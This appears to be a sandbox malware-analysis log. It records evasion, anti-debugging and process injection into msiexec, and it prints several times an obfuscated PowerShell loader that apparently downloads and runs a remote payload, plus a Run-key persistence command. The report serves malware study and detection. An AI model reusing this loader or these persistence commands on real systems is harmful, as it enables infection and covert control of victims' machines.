              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1796Thread sleep count: 5999 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -599782s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -599662s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -599532s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -599407s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -599290s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -599186s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -599047s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -598719s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -598500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -598390s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -598278s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -598172s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -598063s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -597939s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -597813s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -597703s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -597587s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -597485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -597375s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -597264s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -597156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -597047s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -596922s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -596813s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -596703s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -596586s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -596475s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -596356s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -596094s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -595825s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -595719s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -595609s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -595500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -595391s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -595281s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -595172s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -595063s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -594953s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -594844s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -594719s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -594609s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -594500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -594391s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -594282s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -594157s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -594032s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -593907s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -593776s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -593661s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -593531s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -593203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -593032s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599782Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599662Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599290Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599186Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599047Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598719Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598390Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598278Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598063Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597939Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597813Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597587Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597264Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597047Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596922Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596813Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596586Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596475Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596356Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595825Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595719Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595609Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595391Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595281Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595172Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595063Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594953Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594844Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594609Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594391Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594282Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594157Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594032Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593907Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593776Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593661Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593531Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593203Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593032Jump to behavior
              Source: wscript.exe, 00000000.00000002.1005096719.0000019CAA9A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.1004378344.0000019CAC8EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.1003489750.0000019CAA9A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1005096719.0000019CAA9A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.902092381.0000019CAA9AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.895576597.0000019CAA98D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWet
              Source: wscript.exe, 00000000.00000003.1004105711.0000019CAC8CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1004105711.0000019CAC8E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.895282587.0000019CAC8E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.895126082.0000019CAC8CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.895419796.0000019CAC8E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.895419796.0000019CAC8CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1005342030.0000019CAC8E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1005342030.0000019CAC8CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.894742371.0000019CAC8E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.894742371.0000019CAC8CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.1186616029.000001597E757000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_079D65AD LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,5_2_079D65AD

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_6652.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3AE0000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoPrJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $klunketid; function pachyhematous214($rearrangdrr){$blodprocenten=4;do{$holderes+=$rearrangdrr[$blodprocenten];$blodprocenten+=5;$contakia=format-list} until(!$rearrangdrr[$blodprocenten])$holderes}function verdensbermthedernes242($pseudophilanthropic168){ .($chiropractic) ($pseudophilanthropic168)}$signe=pachyhematous214 ' rorn ervesnagt po .b,asw';$signe+=pachyhematous214 ' m,aebj,kbcolocrestlantiiind ebefrn ant';$beetle=pachyhematous214 'unstmf,rfo reuzam.eilambluligl assataka/';$netstrmforsyningens=pachyhematous214 ' fbatgennlwatesunmi1,ate2';$disvisor='knor[ invn .lde supt avo.ham.s orke hypr idevafbii nycnet.estyrpvileosm gi onrn antc tam ud akrafn,malawastgcleae ifrrnedg]gall:phal:cogisrappeptercbumfuantarh emi.akstvideylibepservrbricore ktdyngo,ospcagoromysilcyno=sasc$,fhenforeepolyt rivsmitht ek.ra comva,bfko tounderanfasan ry nicnr neisyntntilsgs phesocin lets';$beetle+=pachyhematous214 ',amu5outf.skam0 kon aadr(opi wskedic,ounfaglduncoo inawostrsadri blanindlt.ofa ut.1ops.0part.unda0jt e;regi unwhwshipiskolnkvge6expa4aart;r su noex bl 6c ro4con ;ma.n .unirstenvakse: s d1 bek3lix 4pr v. p.r0stoo)svar ansvgynglebaglcmuscktrano inf/snub2grov0pro 1cler0cons0 ibs1time0vam 1u th priff rsiherbr fo,e plefdipoorappxreth/beha1aest3maxi4genz.foli0';$troppes=pachyhematous214 'khaluboufs,eciedrplrr gi-trysaprolgsed,erundnmisst';$imperativ=pachyhematous214 'flugh hv tc ret dehprejfsblyh:bryd/semi/vegeh oriopr,vmd scaindiy setelunk-sco sleiba,aemlmlleapagem.ogfaflogtsand.ce tcugeno u,dmk gl/ nprtsparosystpperq/,onic su.o esklp,ptl ubeeoutbgsaalilullabespnn.utt rr,.borepta efamalb';$afkalkningsanlgget=pachyhematous214 'sche>';$chiropractic=pachyhematous214 'distigorbeaurex';$neuronic='afrydningen';$afgrdevalg219='\toldeftersyn.man';verdensbermthedernes242 (pachyhematous214 ' exo$ kaigsydsl ageob rdbavalademolbala:.yaegfac lnobey idfnagly= .ar$hydre seinf,agv fo :coawa e tpaeonp lundudstamanvts,lua lis+indi$chefa,equfpaamg crer .dmdf ree ,ukvdolkasamflkumaghvid2n ni1hete9');verdensbermthedernes242 (pachyhematous214 'sed $d.pogs.dblmuddo u obdeliaskoslr.pi:hj,mt reholebef ne otingr repemono=unim$gameijingm r np lyselu,er lina o.at aceidyppv non.h,ves spophalclrilliexogtcalc( lgo$u unavrelf,reskgigmadundlhaemke penesquilydsn i sgsycosmetaanotenungdl rasgbatig isiepseuthepa)');verdensbermthedernes242 (pachyhematous214 $disvisor);$imperativ=$tofore[0];$optllingens=(pachyhematous214 'cann$ hanginfalfomeo ndbpatcat lslbo i:gelab,omiemonotjagta sublvareit.wingratgor assoffe st vstumntranebi e=galansocreuroswsjus-lslao s obantijphy ecroscafslt t i s ftssultygue.s thetsecrepennm op .ido.$civis,ormiovergvelsn pare');verdensbermthedernes242 ($optllingens);verdensbermthedernes242 (pachyhematous214 ' g n$replbper,e last o eagamel orsiomphn ,olgor lsvir eval v dvbnindsevejr.rankhr.tiev caa d,dd aaesubarhvorsblac[ b,s$macrtneurrsupeopr
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $klunketid; function pachyhematous214($rearrangdrr){$blodprocenten=4;do{$holderes+=$rearrangdrr[$blodprocenten];$blodprocenten+=5;$contakia=format-list} until(!$rearrangdrr[$blodprocenten])$holderes}function verdensbermthedernes242($pseudophilanthropic168){ .($chiropractic) ($pseudophilanthropic168)}$signe=pachyhematous214 ' rorn ervesnagt po .b,asw';$signe+=pachyhematous214 ' m,aebj,kbcolocrestlantiiind ebefrn ant';$beetle=pachyhematous214 'unstmf,rfo reuzam.eilambluligl assataka/';$netstrmforsyningens=pachyhematous214 ' fbatgennlwatesunmi1,ate2';$disvisor='knor[ invn .lde supt avo.ham.s orke hypr idevafbii nycnet.estyrpvileosm gi onrn antc tam ud akrafn,malawastgcleae ifrrnedg]gall:phal:cogisrappeptercbumfuantarh emi.akstvideylibepservrbricore ktdyngo,ospcagoromysilcyno=sasc$,fhenforeepolyt rivsmitht ek.ra comva,bfko tounderanfasan ry nicnr neisyntntilsgs phesocin lets';$beetle+=pachyhematous214 ',amu5outf.skam0 kon aadr(opi wskedic,ounfaglduncoo inawostrsadri blanindlt.ofa ut.1ops.0part.unda0jt e;regi unwhwshipiskolnkvge6expa4aart;r su noex bl 6c ro4con ;ma.n .unirstenvakse: s d1 bek3lix 4pr v. p.r0stoo)svar ansvgynglebaglcmuscktrano inf/snub2grov0pro 1cler0cons0 ibs1time0vam 1u th priff rsiherbr fo,e plefdipoorappxreth/beha1aest3maxi4genz.foli0';$troppes=pachyhematous214 'khaluboufs,eciedrplrr gi-trysaprolgsed,erundnmisst';$imperativ=pachyhematous214 'flugh hv tc ret dehprejfsblyh:bryd/semi/vegeh oriopr,vmd scaindiy setelunk-sco sleiba,aemlmlleapagem.ogfaflogtsand.ce tcugeno u,dmk gl/ nprtsparosystpperq/,onic su.o esklp,ptl ubeeoutbgsaalilullabespnn.utt rr,.borepta efamalb';$afkalkningsanlgget=pachyhematous214 'sche>';$chiropractic=pachyhematous214 'distigorbeaurex';$neuronic='afrydningen';$afgrdevalg219='\toldeftersyn.man';verdensbermthedernes242 (pachyhematous214 ' exo$ kaigsydsl ageob rdbavalademolbala:.yaegfac lnobey idfnagly= .ar$hydre seinf,agv fo :coawa e tpaeonp lundudstamanvts,lua lis+indi$chefa,equfpaamg crer .dmdf ree ,ukvdolkasamflkumaghvid2n ni1hete9');verdensbermthedernes242 (pachyhematous214 'sed $d.pogs.dblmuddo u obdeliaskoslr.pi:hj,mt reholebef ne otingr repemono=unim$gameijingm r np lyselu,er lina o.at aceidyppv non.h,ves spophalclrilliexogtcalc( lgo$u unavrelf,reskgigmadundlhaemke penesquilydsn i sgsycosmetaanotenungdl rasgbatig isiepseuthepa)');verdensbermthedernes242 (pachyhematous214 $disvisor);$imperativ=$tofore[0];$optllingens=(pachyhematous214 'cann$ hanginfalfomeo ndbpatcat lslbo i:gelab,omiemonotjagta sublvareit.wingratgor assoffe st vstumntranebi e=galansocreuroswsjus-lslao s obantijphy ecroscafslt t i s ftssultygue.s thetsecrepennm op .ido.$civis,ormiovergvelsn pare');verdensbermthedernes242 ($optllingens);verdensbermthedernes242 (pachyhematous214 ' g n$replbper,e last o eagamel orsiomphn ,olgor lsvir eval v dvbnindsevejr.rankhr.tiev caa d,dd aaesubarhvorsblac[ b,s$macrtneurrsupeopr
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "faderskabernes" /t reg_expand_sz /d "%demiowl% -windowstyle 1 $piddlingly=(gi 'hkcu:\software\underforstaaende\').getvalue('udbetalingskortet');%demiowl% ($piddlingly)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $klunketid; function pachyhematous214($rearrangdrr){$blodprocenten=4;do{$holderes+=$rearrangdrr[$blodprocenten];$blodprocenten+=5;$contakia=format-list} until(!$rearrangdrr[$blodprocenten])$holderes}function verdensbermthedernes242($pseudophilanthropic168){ .($chiropractic) ($pseudophilanthropic168)}$signe=pachyhematous214 ' rorn ervesnagt po .b,asw';$signe+=pachyhematous214 ' m,aebj,kbcolocrestlantiiind ebefrn ant';$beetle=pachyhematous214 'unstmf,rfo reuzam.eilambluligl assataka/';$netstrmforsyningens=pachyhematous214 ' fbatgennlwatesunmi1,ate2';$disvisor='knor[ invn .lde supt avo.ham.s orke hypr idevafbii nycnet.estyrpvileosm gi onrn antc tam ud akrafn,malawastgcleae ifrrnedg]gall:phal:cogisrappeptercbumfuantarh emi.akstvideylibepservrbricore ktdyngo,ospcagoromysilcyno=sasc$,fhenforeepolyt rivsmitht ek.ra comva,bfko tounderanfasan ry nicnr neisyntntilsgs phesocin lets';$beetle+=pachyhematous214 ',amu5outf.skam0 kon aadr(opi wskedic,ounfaglduncoo inawostrsadri blanindlt.ofa ut.1ops.0part.unda0jt e;regi unwhwshipiskolnkvge6expa4aart;r su noex bl 6c ro4con ;ma.n .unirstenvakse: s d1 bek3lix 4pr v. p.r0stoo)svar ansvgynglebaglcmuscktrano inf/snub2grov0pro 1cler0cons0 ibs1time0vam 1u th priff rsiherbr fo,e plefdipoorappxreth/beha1aest3maxi4genz.foli0';$troppes=pachyhematous214 'khaluboufs,eciedrplrr 